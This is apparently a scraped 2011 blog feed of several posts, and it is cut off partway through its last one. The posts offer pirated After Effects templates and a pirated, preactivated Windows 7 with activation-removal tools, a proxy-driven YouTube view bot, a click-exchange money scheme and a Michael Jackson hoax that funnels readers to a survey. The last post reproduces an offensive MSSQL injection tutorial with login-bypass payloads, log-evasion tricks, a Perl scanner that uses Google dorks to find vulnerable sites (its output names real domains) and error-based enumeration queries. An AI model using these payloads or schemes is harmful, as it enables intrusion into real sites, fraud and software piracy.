Arena of An Artist

VideoHive Dual Reality 180162 After Effects Project Template Download

noreply@blogger.com (ArtistAshish) — Sun, 17 Jul 2011 10:02:00 +0000

VideoHive Dual Reality 180162

After Effects Project Template Download

Award Winning Project!

Demo: http://videohive.net/item/dual-reality/180162

DOWNLOAD HERE

Part 1

http://www.multiupload.com/96B950KSPY

Part 2

http://www.multiupload.com/1CWVQ7DXZJ

ENJOY..!

Youtube LikeGen Bot ( INCREASE YOUTUBE VIEWS )

noreply@blogger.com (ArtistAshish) — Sun, 17 Jul 2011 07:17:00 +0000

Hello !
I just found this bot in HackForums
It uses proxies to get views for YouTube videos .

Download Link : YoutubeViewer
Instructions :

1.Extract the Rar file .
2.Run Patch.exe
3.Run Youtube Viewer V3!.exe
4.Load proxy list (provided in the rar) you can get more by googling.
5.Click on Start and wait :)

Note : Dont Change any other value

Screenshot :
http://imgsrc.in/?v=youtube.png

Happy Youtubing :)

Download New Facebook App And Enjoy Facebook on any Mobile Phone

noreply@blogger.com (ArtistAshish) — Sun, 17 Jul 2011 07:11:00 +0000

At Facebook, we work to ensure people around the world have a great Facebook experience no matter where they are or how they access our site.

Today, we're launching the new Facebook for Every Phone app, which offers a fast and comprehensive Facebook experience on over 2,500 different phones. This app not only includes Facebook’s most popular features, such as News Feed, Inbox, and Photos, but also enables you to upload photos and find friends from your phone’s contacts. People all over the world can download the app by visiting m.facebook.com and scrolling down to the download link, or by entering d.facebook.com/install directly into their mobile browser. You can also find it in leading app stores, including GetJar, Appia, and Mobile Weaver.

We also want to make sure the Facebook for Every Phone app is affordable to try and use, which is why we’ve collaborated with many carriers worldwide (see list below) to offer you free data access to this app for 90 days. This experience is optimized to use less data than other Java apps or mobile sites, making it much more affordable for people to use when the 90-day period ends.

The Facebook for Every Phone app will be available globally on Java-enabled phones starting today, and we are working on making the app compatible with even more handsets in the future.

With one easy download of this app, get all of what Facebook has to offer on your mobile device so you can stay connected with your family and friends wherever you are. For more information on how to download and use this application, you can check out the video below.

Carriers offering free data access for a limited time:
•   Aircel (India)
•   Airtel (India)
•   Banglalink (Bangladesh)
•   Beeline (Russia)
•   Celcom (Malaysia)
•   Etisalat (Egypt, Nigeria)
•   Globe (Philippines)
•   Idea (India)
•   O2 Telefonica (Germany)
•   Reliance (India)
•   Smart (Philippines)
•   Smartfren (Indonesia)
•   Telkomsel (Indonesia)
•   Three (Indonesia, United Kingdom)
•   TIM (Brazil)
•   TMN (Portugal)
•   Ufone (Pakistan)
•   Vodafone (Turkey)

Real Michael Jackson Died 10 Years Ago- This Shocking Video Confirms it

noreply@blogger.com (ArtistAshish) — Tue, 15 Mar 2011 10:35:00 +0000

Video Confirming the Truth of Michael Jackson.

The Real Michael Jackson Died 10 Years Ago During one of his Secret Surgeries. The Person impersonating him after that was just a puppet of big music hot shots who earned hell lot Money after that. Finally that person was also declared dead and people made a lot of money by that also.

Watch this video to see the Truth...

Verify yourself by Completing the Survey

DOWNLOAD Microsoft Windows 7™ SP1 RT

noreply@blogger.com (ArtistAshish) — Tue, 15 Mar 2011 09:40:00 +0000

Credit goes to the original uploader 'faXcooL' for this wonderful share!!

Windows 7 Service Pack 1(SP1) 32/64 Bit -PREACTIVATED
32/64-BIT • PREACTIVATED • BOOTABLE • UNTOUCHED • GENUINE • MULTILINGUAL • FULLY UPDATABLE

This release includes all available verisons of Windows 7 (except "N" and "E" editions)

This DVD Includes :

* Windows 7 Starter 32-bit
* Windows 7 Home Basic 32/64-bit
* Windows 7 Home Premium 32/64-bit
* Windows 7 Professional 32/64-bit
* Windows 7 Enterprise 32/64-bit
* Windows 7 Ultimate 32/64-bit

Fits on a standard 4.7GB DVD

Windows 7 Starter
*********************

Windows 7 Starter is the edition of Windows 7 that contains the fewest
features. Windows 7 Starter is only available in a 32-bit version. The Windows Aero theme is not included in this version. The desktop wallpaper and Visual Styles (Windows 7 Basic) are not user-changeable. Its functions are very limited. Microsoft originally intended to restrict the edition to running 3 simultaneous applications, but this limitation was dropped. This edition is available pre-installed on computers, especially netbooks, through system integrators or computer manufacturers using OEM licences.

Windows 7 Home Basic
**********************

Windows 7 Home Basic is available in emerging markets such as Argentina, Brazil, Chile, the People's Republic of China, Colombia, India, Pakistan, Panama, Philippines, Mexico, Russia, Thailand, and Turkey. It is not available in developed technology markets countries including in Western and Central Europe, North America, Hong Kong, Australia and Saudi Arabia. Some Aero options are excluded along with several new features. Home Basic, along with other editions sold in emerging markets, include geographical activation restriction, which requires users to activate Windows within a certain region
or country.

Windows 7 Home Premium
**********************

This edition contains features aimed at the home market segment, such as Windows Media Center, Windows Aero and multi-touch support.

Windows 7 Professional
**********************

This edition is targeted towards enthusiasts and small-business users. It includes all the features of Windows 7 Home Premium, and adds the ability to participate in a Windows Server domain. Additional features include operating as a Remote Desktop server, location aware printing, Encrypting File System, Presentation Mode, Software Restriction Policies (but not the extra management features of AppLocker) and Windows XP Mode. Like Enterprise, Microsoft will support this edition until 2020.

Windows 7 Enterprise
**********************

This edition targets the enterprise segment of the market and is sold through volume licensing to companies which have a Software Assurance contract with Microsoft. Additional features include support for Multilingual User Interface (MUI) packages, BitLocker Drive Encryption, and UNIX application support. Not available through retail or OEM channels, this edition is distributed through Microsoft Software Assurance (SA). As a result it includes several SA-only benefits, including a license allowing the operating of diskless nodes (diskless PCs), the running of multiple virtual machines, and activation via VLK. Like Professional, Microsoft will support this edition until 2020.

Windows 7 Ultimate
**********************

Windows 7 Ultimate contains all of the same features as Windows 7 Enterprise, but unlike the Enterprise edition, it is available to home users on an individual license basis. Windows 7 Home Premium and Windows 7 Professional users are able to upgrade to Windows 7 Ultimate for a fee using Windows Anytime Upgrade if they wish to do so. Unlike Windows Vista Ultimate, the Windows 7 Ultimate edition does not include the Windows Ultimate Extras feature or any exclusive features as Microsoft had stated. However, even though it is the consumer equivalent to Enterprise, Microsoft will only support Ultimate until 2015, as per Home Premium.

If you want to run Windows 7 on your PC, here's what it takes:
1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor
1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit
16 GB available hard disk space (32-bit) or 20 GB (64-bit)
DirectX 9 graphics device with WDDM 1.0 or higher driver

How to install :
**************

- Extract using WinRAR.
- Use ImgBurn** to burn the extracted ISO file called "faXcooL.Windows.7.SP1.ENG.x86-x64.ACTiVATED"
* You can use any other software for this operation (Nero, Alcohol, CloneCD...)
* Burning speed should not be faster than 4x.
- Restart your computer*.
* You can install it from existing OS, but I'll recommend the clean installation.
- Make sure you've seleceted your DVD-ROM/RW drive as a first boot device (BIOS setup)*
* If you don't know how to do that, check this link

- The text message will appear "Press any key to boot from CD or DVD...."
* By pressing the key you're entering the setup.
- Select your language, time and currency and keyboard input (optionaly)
- Click "Install now".
- Choose your edition* (x86 is 32-bit, x64 is 64-bit) depending of CPU type you have.
* Note that if you have less than 4GB of RAM, x64 will be useless.
- Click "I accept".
- Click "Custom (advanced).
- Choose your partition/hdd drive where Win7 should be installed and click format.
* Setup will continue automaticly and it will finish after 15-30 min.
- Next step will be username (Image 17).
- Type your password (if you want).
- Choose the third option for next step.
- Select your time zone.
- Select your current location.
- And the last step will be silent auto-activation*
* Your PC will restart for the last time.

And that would be all about installation. You're in Windows now.

Activation
**************

This release has integrated RemoveWAT 2.2.6.0.
This tool completely removes Windows Activation Technologies from your sytem and your Windows will be fully activated and fully updateable, plus, you won't have to worry about malicious updates (i.e. KB971033) which can deactivate your copy of Windows.

Hotfile->

http://safelinking.net/p/9d8bcbbaef

Fileserve->

http://safelinking.net/p/3aaf1c7863

Before Installing Microsoft Security Essentials run Windows Loader:->

http://safelinking.net/p/90c819126d

Premium Link Generators->

http://deamonleech.com/
http://www.teraleech.com/

ENJOY..!

MyLikes Palringo- Make $$ with Twitter

noreply@blogger.com (ArtistAshish) — Tue, 15 Mar 2011 09:26:00 +0000

MyLikes Palringo- Make $$ with Twitter

Q. What is Mylikes and how it works?

A. MyLikes is word-of-mouth advertising platform that connects advertisers with influencers on the web. Influencers can spread the word and earn money.Here you'll connect campaigns i.e ads to your twitter/facebook accounts and when people click the links.

Q. Is it legit?

A. Yes, it is.Search google if you dont believe me.I cant blog here.

Q.How do we make money?
A."Click Exchange".And for this we have made a Palringo group "Mylikes"

Q.What do we need to do?

A. 1) dwnload palringo and Install it.
2) Signup on Mylikes.com
3) Now join this group "Mylikes"
4)Exchange links with people online(without http://)
5) Open Chrome in Incognito window.
6) Go to their profile and click the links with -AD at their end

SQL INJECTION TUTORIAL.. with Full Concepts and Details

noreply@blogger.com (ArtistAshish) — Fri, 04 Mar 2011 19:24:00 +0000

|=--------------------------------------------------------------------=|
  |=----------------=[  Full MSSQL Injection PWNage  ]=-----------------=|
  |=-----------------------=[ 28 January 2009 ]=------------------------=|
  |=---------------------=[  By CWH Underground  ]=---------------------=|
  |=--------------------------------------------------------------------=|
    

######
 Info
######

Title : Full MSSQL Injection PWNage
Author : ZeQ3uL && JabAv0C
Team    : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-01-28


##########
 Contents
##########

  [0x00] - Introduction

  [0x01] - Know the Basic of SQL injection

 [0x01a] - Introduction to SQL Injection Attack
 [0x01b] - How to Test sites that are Vulnerable in SQL Injection
 [0x01c] - Bypass Authentication with SQL Injection
 [0x01d] - Audit Log Evasion
 [0x01e] - (Perl Script) SQL-Google searching vulnerable sites 

  [0x02] - MSSQL Normal SQL Injection Attack
 
 [0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
 [0x02b] - ODBC Error Message Attack with "CONVERT"
 [0x02c] - MSSQL Injection with UNION Attack
 [0x02d] - MSSQL Injection in Web Services (SOAP Injection)

  [0x03] - MSSQL Blind SQL Injection Attack
 
 [0x03a] - How to Test sites that are Vulnerable in Blind SQL Injection
 [0x03b] - Determine data through Blind SQL Injection
 [0x03c] - Exploit Query for get Table name 
 [0x03d] - Exploit Query for get Column name

  [0x04] - More Dangerous SQL Injection Attack

 [0x04a] - Dangerous from Extended Stored Procedures
 [0x04b] - Advanced SQL Injection Techniques
 [0x04c] - Mass MSSQL Injection Worms

  [0x05] - MSSQL Injection Cheat Sheet

  [0x06] - SQL Injection Countermeasures

  [0x07] - References

  [0x08] - Greetz To


#######################
 [0x00] - Introduction
#######################

 Welcome reader, this paper is a short attempt at documenting a practical technique 
we have been working on. This papers will guide about technique that allows the attackers 
(us) gaining access into the process of exploiting a website via SQL Injection Techniques
that we focused on MSSQL only

 This paper is divided into 8 sections but only from section 0x01 to 0x06
are about technical information.

 Section 0x01, we talk about basic knowledge of SQL injection vulnverabilities which
are classified into two types, normal and blind. Section 0x02, we give a detail of each way 
attacking through SQL injection. Section 0x03, we explain the way to enumerate data through 
blind sql injection technique. Section 0x04, we show more dangerous approaches which can occur 
through SQL injection vulnerabilities. Section 0x05, we collect MSSQL queries in several purposes.
Section 0x06, we offer some tips in order to prevent the system from SQL injection attack.


##########################################
 [0x01] - Know the Basic of SQL injection
##########################################
 
 SQL injection vulnerabilities occur when the database server can be made to execute arbitrary SQL 
(Structured Query Language) commands. Typically executed through the web application front end (use interface,
form, etc.), the attack involves entering malformed or unexpected SQL statements which result in unauthorized
execution of SQL commands on the database server.  


 ++++++++++++++++++++++++++++++++++++++++++++++++
  [0x01a] - Introduction to SQL Injection Attack
 ++++++++++++++++++++++++++++++++++++++++++++++++
 
  SQL injection attacks occur when malicious SQL commands are injected into a predefined SQL query 
 in order to alter the outcome of the query. Take the example of an application that requests a user id 
 for authentication. The application adds this user ID to a predefined SQL query to perform authentication. 
 
  However, if instead of providing a valid user name the attacker inputs a specialized SQL command 
 that forces the termination of the predefined SQL query and forces the execution of a new SQL query. In this 
 way the attacker can execute any SQL command on the host system without even needing to log in. 
 
  A successful SQL injection exploit can read sensitive data from the database, modify database data 
 (Insert/Update/Delete), execute administration operations on the database (such shutdown the DBMS), recover 
 the content of a given file present on the DBMS filesystem and in some cases issue commands to the operating system. 
 
  An application is vulnerable to SQL injection attack when:
   - User input is incorrectly filtered for string literal escape characters embedded in SQL statements.
   - User input is either not restricted ? e.g. through strong typing - and thereby can be made to execute
     in an unexpected manner
 
  SQL Injection always occur in application that needs to talk to a Database include:
   - Authentication forms (Login Pages)
   - Search forms
   - E-Commerce sites
   - Forum / Webboard
   - Content Manage System (CMS's that use DB),Such as: 
    Joomla Components (http://www.milw0rm.com/search.php?dong=joomla)
    Mambo Components (http://www.milw0rm.com/search.php?dong=mambo)
    Wordpress Plugin (http://www.milw0rm.com/search.php?dong=wordpress)

 
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x01b] - How to Test sites that are vulnerable in SQL Injection
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
  We must make a list of all input fields whose values could be used in crafting a SQL query, 
 including the hidden fields of POST requests and then test them separately, trying to interfere with 
 the query and to generate an error. The very first test usually consists of adding a single quote (') 
 , double quote ("") or a semicolon (;) to the field under test. 
 
 [Simple URL] http://www.example.com/news.asp?id=10
 [Test SQLi]  http://www.example.com/news.asp?id=10'

  It's vulnerable in SQL injection,If the output some error like this:
 
 [HTTP Response]-----------------------------------------------------------------------------
 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
 [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the 
 character string ''.
 /news.asp, line 52
 [End HTTP Response]-------------------------------------------------------------------------

  Next solution, Use "OR/AND" Operation for testing SQL injection vulnerability:
 
  If contains is the different as original URL that dump all data 
 from database, It's vulnerable in SQL injection.

 [Simple URL] http://www.example.com/news.asp?id=2

 [output]------------------------------------------------------------------------------------
 News: 2
 Details: Preventing blind SQL injection attacks, Most security professionals know ... 
 [End Output]--------------------------------------------------------------------------------


 [Test SQLi] http://www.example.com/news.asp?id=2' or '1'='1

 [output]------------------------------------------------------------------------------------
 News: 1
 Details: SQL injection attack infects hundreds of thousands of websites ...

 News: 2
 Details: Preventing blind SQL injection attacks, Most security professionals know ... 
 
 News: 3
 Details: Mass SQL injection, There's another round of mass SQL injections going on which has infected ...
 
 News: 4
 Details: New Botnet Malware Spreading SQL injection attack tool ...
 [End Output]--------------------------------------------------------------------------------

  That's Great !! Can you see something different from original URL ? (It's Vuln in SQL Injection Attacks),
 It's return all query from DB, Why ??

 [ASP_code]
 var sql = "SELECT * FROM news WHERE id = '" + getid +"'";
 [End ASP_code]

 [Final query //id=2]
 SELECT * FROM news WHERE id = '2'  // It's will return News 2
 [End id=2]

 [Final query //id=2' or 'a'='a]   // Testing SQLi Vuln
 SELECT * FROM news WHERE id = '2' or 'a'='a' // It's include ' or 'a'='a into SQL statement and the condition is TRUE,
       //  So It will return all news (id=1,2,3,...)
 [End id=2' or 'a'='a]



 ++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x01c] - Bypass Authentication with SQL Injection
 ++++++++++++++++++++++++++++++++++++++++++++++++++++

  This basic technique for "bypass Login" when application use DB to checking authentication.
 However, an attacker may possibly bypass this check with SQL injection.
 
 [Example scripts]

 +-----------------------------+
 |   ' or 1=1 --       |
 |   a' or 1=1 --       |
 |   " or 1=1 --       |
 |   a" or 1=1 --       |
 |   ' or 1=1 #       |
 |   " or 1=1 #       |
 |   or 1=1 --       |
 |   ' or 'x'='x       |
 |   " or "x"="x       |
 |   ') or ('x'='x       |
 |   ") or ("x"="x       |
 | ' or username LIKE '%admin% |
 +-----------------------------+
 |      USERNAME:  ' or 1/*    |
 |      PASSWORD:  */ =1 --    |
 +-----------------------------+
 |  USERNAME: admin' or 'a'='a |
 |  PASSWORD: '#        |
 +-----------------------------+

 [Login ASP_code]----------------------------------------------------------------------------
 var sql = "SELECT * FROM users WHERE username = '" + formusr + "' AND password ='" + formpwd + "'";
 [End Login ASP_code]------------------------------------------------------------------------

  When we input something like this:
  formusr = admin
  formpwd = ' or 'a='a

 [SQL Query]---------------------------------------------------------------------------------
 SELECT * FROM users WHERE username = 'admin' AND password = '' or 'a'='a'
 [End Code]----------------------------------------------------------------------------------

  This SQL condition is TRUE and bypass login process, So you don't need admin's password. (Just use ' or 'a'='a)

  If we input something like this
  formusr = ' or 1=1 -- 
  formpwd = anything
 
 [SQL Query]---------------------------------------------------------------------------------
 SELECT * FROM users WHERE username = '' or 1=1 -- AND password = 'anything'
 [End Code]----------------------------------------------------------------------------------

  ** Note **

  --  is comment operator of MSSQL DB used to comment out everything following this operator.
  /*Comment*/ Inline comment, Comments out rest of the query by not closing them / Bypass blacklisting.
    
    DROP/*comment*/sampletable 
    DR/**/OP/*bypass blacklisting*/sampletable 
    SELECT/*avoid-spaces*/password/**/FROM/**/Members


  If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then
 you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash 
 of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.
  
  formusr = admin 
  formpwd = pass ' AND 1=2 UNION ALL SELECT 'admin', '1a1dc91c907325c69271ddf0c944bc72

 1a1dc91c907325c69271ddf0c944bc72 = MD(pass)

 +++++++++++++++++++++++++++++
  [0x01d] - Audit Log Evasion
 +++++++++++++++++++++++++++++

  When we injection some code with SQLi Techniques, All of the SQL queries can be logged and admin can know what's happen ?
 The technique for evade logging, We use "sp_password"

  formusr = ' or 1=1 -- sp_password
  formpwd = anything

  SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries 
 it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible).

 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x01e] - (Perl Script) SQL-Google searching vulnerable sites
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
  The Good way to searching sites that have SQL injection vulnerability is "Google" 
 (That powerful to use every search engines to searching with IRCbots). We developed simple Perl script for
 searching SQL injection holes (MSSQL, Mysql, MS Access, Oracle) name "SQL-Google Search":

 [code]-----------------------------------------------------------------------------------

 #!/usr/bin/perl
 use LWP::Simple;
 use LWP::UserAgent;
 use HTTP::Request;
 my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } 
 print "+++++++++++++++++++++++++++++++\n";
 print "+     SQL - Google Search     +\n";
 print "+       CWH Underground       +\n";
 print "+++++++++++++++++++++++++++++++\n\n";
 print "Insert Dork:";
 chomp( my $dork =  );
 print "Total Query Pages (10 Links/Pages) :";
 chomp( my $page =  );
 print "\n[+] Result:\n\n";
 for($start = 0;$start != $page*10;$start += 10)
 { 
 $t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
     $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
     $ua->timeout(10);
     $ua->env_proxy;
     $response = $ua->get($t);
     if ($response->is_success)
     {
         $c = $response->content;
         @stuff = split(/         foreach $line(@stuff)
         {
             if($line =~/(.*) class=l/ig)
             {
                 $out = $1;
                 $out =~ s/\"//g;
   $out =~s/$/\'/;    
   $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
   $ua->timeout(10);
   $ua->env_proxy;
   $response = $ua->get($out);
   $error = $response->content();
   if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
    {print "$out => Could be Vulnerable in MySQL Injection!!\n";}
   elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
    {print "$out => Could be Vulnerable in MS Access Injection!!\n";}
   elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
    {print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
   elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
    {print "$out => Could be Vulnerable in Oracle Injection!!\n";}
      }
  }
     }
        }

 [End code]----------------------------------------------------------------------------------
 
 [output]------------------------------------------------------------------------------------
 
 +++++++++++++++++++++++++++++++
 +     SQL - Google Search     +
 +       CWH Underground       +
 +++++++++++++++++++++++++++++++

 Insert Dork:index.asp?sid=
 Total Query Pages (10 Links/Pages) :5

 [+] Result:

 http://www.ris.org.uk/index.asp?sid=7&mid=5' => Could be Vulnerable in MSSQL Injection!!
 http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307' => Could be Vulnerable in MSSQL Injection!!
 http://www.ilri.org/research/Index.asp?SID=4' => Could be Vulnerable in MSSQL Injection!!
 
 [End output]--------------------------------------------------------------------------------


############################################
 [0x02] - MSSQL Normal SQL Injection Attack
############################################

 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  
  We can use information from error message produced by the MS SQL Server to get almost any data we want. 
 
 - "GROUP BY" is a microsoft sql server command used to group output of particular sql query.
 - "HAVING" is a command used to specify a search condition for a group or an aggregate. 
   this command is always used with "GROUP BY" otherwise the error will return.

  As the operation of these two commands, we can take advantage of them in order to 
 obtain particular table name and all column names of this table. We will explain you by using an example.

  First, The target has a table called "news" and in news, there are three columns, which are news_id, news_author and news_detail.
 
 The vulnerable page is http://www.example.com/page.asp?id=1
 The query in this page is something like 

  [Query]-----------------------------------------------------------------------------
  var query = "SELECT * FROM news WHERE news_id= '" + column+ "'";
  [End query]-------------------------------------------------------------------------

 So, we can inject HAVING command in order to observe returned error
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1' HAVING 1=1--
  [End SQLi]--------------------------------------------------------------------------

 The query will be 

  SELECT * FROM news WHERE news_id='1' HAVING 1=1--'

 We will get the error as following:
  
  ------------------------------------------------------------------------------------
  Microsoft OLE DB Provider for SQL Server error '80040e14'
  [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in 
  the select list because it is not contained in an aggreate function and there is no GROUP BY clause. 
  ------------------------------------------------------------------------------------

 In this error, we know table name = "news", used in this page and 
 one column name = "news_id", contained in particular table.
 
 The error is originate from using HAVING command without GROUP BY command. 
 Moreover, we can get the other column names by using combination of GROUP BY and HAVING command.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1' GROUP BY news.news_id HAVING 1=1--
  [End SQLi]--------------------------------------------------------------------------

 The query will be

  SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id HAVING 1=1--'

 We will get the error
  
  ------------------------------------------------------------------------------------
  Microsoft OLE DB Provider for SQL Server error '80040e14'
  [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_author' is invalid in 
  the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
  ------------------------------------------------------------------------------------

 Now, we know the second column name of table1 = "news_author". The third column name can be obtained 
 by adding the second column name in the previous query
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author HAVING 1=1--
  [End SQLi]--------------------------------------------------------------------------

 The query will be

  SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id,news.news_author HAVING 1=1--'

 The request will generate following error
  
  ------------------------------------------------------------------------------------
  Microsoft OLE DB Provider for SQL Server error '80040e14'
  [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in 
  the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
  ------------------------------------------------------------------------------------

 The third column name = "news_detail", pops up in returned error. If we had more columns, 
 we could add news_detail in GROUP BY clause of previous request then we could get the forth column name.

 When we added all of column in GROUP BY clause, we will get normal result and
 we absolutely know that we obtained all column name in table1.

 As this example, the request below will generate no error.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author,news_detail HAVING 1=1--
  [End SQLi]--------------------------------------------------------------------------

 The query will be

  SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id,news.news_author,news_detail HAVING 1=1--'

 As no error return, we know that table1 consists of three columns which are "news_id", "news_author" and "news_detail".


 ++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x02b] - ODBC Error Message Attack with "CONVERT"
 ++++++++++++++++++++++++++++++++++++++++++++++++++++

  In our opinion, MSSQL expresses much information in returned error. It is useful for programmers to debug their application meanwhile 
 it is valuable for many attackers, as seeing in previous section.

  In this section, we provide another method of utilizing from MSSQL error through a command called "convert".
 convert command is used to convert between two data type and when the specific data cannot convert to another type, 
 this command will return error. let see through an example:

 In this example, we show you how to obtain MSSQL_Version, DB_name, User_name.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)--
  [End SQLi]--------------------------------------------------------------------------
 
 Error Message returned:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 
  22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1) 
  ' to data type int.
  /page.asp, line 9 
  ------------------------------------------------------------------------------------
 
 Now, We know the version of MSSQL and OS (Windows 2003 Server), Let's go to enumerate DB_name.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--
  [End SQLi]--------------------------------------------------------------------------
 
 Error Message returned:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
  /page.asp, line 9
  ------------------------------------------------------------------------------------

 We can know the Database name = "cwhdb", Next is query for get current user that run DB.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--
  [End SQLi]--------------------------------------------------------------------------

 Error Message returned:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'sa' to data type int.
  /showthread.asp, line 9
  ------------------------------------------------------------------------------------

 W00t!! W00t!!, It use "sa" privileges lol. This information can help us that we can use extended 
 stored procedure "XP_CMDSHELL" to run arbitrary command executes.


 In next example, we show you how to obtain table names, column names and data.

 Take a look at our First request
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--
  [End SQLi]--------------------------------------------------------------------------

 "information_schema.tables" stores information about tables in databases and there is a field called "table_name" 
 which stores names of each table. The result of this request is something like this:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'threads' to data type int.
  /page.asp, line 9 
  ------------------------------------------------------------------------------------

  From the query, we get threads as a nvarchar data type and as it cannot convert from threads to int data type, the error is returned.
 Therefore, we know the first table = "threads", from this error. The next step is looking for the second table. 
 We only put WHERE clause append the query in above request.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+
  not+in+('threads')))--
  [End SQLi]--------------------------------------------------------------------------

 We will get an error like this:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'users' to data type int.
  /page.asp, line 9 
  ------------------------------------------------------------------------------------

 Again, we know the second table = "users", from the error. If we want another table, we just append our known table list. for example,
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+
  not+in+('threads','users')))--
  [End SQLi]--------------------------------------------------------------------------

 And we will get an error:

  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'forums' to data type int.
  /page.asp, line 9
  ------------------------------------------------------------------------------------

 This means the third table = "forums". On the other hand, if the previous request return something like this.
  
  ------------------------------------------------------------------------------------
  ADODB.Field error '800a0bcd'
  Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
  /page.asp, line 10
  ------------------------------------------------------------------------------------

 It means this database consists of only two tables, threads and users.

  OK, now, we already get all tables. The next target is column names.
 The method to retrieve column names is not much different from getting table names.
 We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
 but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.

 Don't talk too much, let see an example
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--
  [End SQLi]--------------------------------------------------------------------------

 From this request, we get an following error
 
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'uname' to data type int.
  /showthread.asp, line 9 
  ------------------------------------------------------------------------------------

 As the same approach of getting table names, we abruptly know that the first column of table 'users' is "uname".
 For another column name, we add a bit in WHERE clause.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+
  and+column_name+not+in+('uname')))--
  [End SQLi]--------------------------------------------------------------------------

 We will get an below error.
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'upass' to data type int.
  /showthread.asp, line 9 
  ------------------------------------------------------------------------------------

 Absolutely we know the second column = "upass", of table 'users'. For getting more column names, 
 we only append a known table list like that in getting table names. For example,
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+
  and+column_name+not+in+('uname','upass')))--
  [End SQLi]--------------------------------------------------------------------------

 The Error message:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'email' to data type int.
  /showthread.asp, line 9 
  ------------------------------------------------------------------------------------

 So, the third column is "email". but if the error is
  
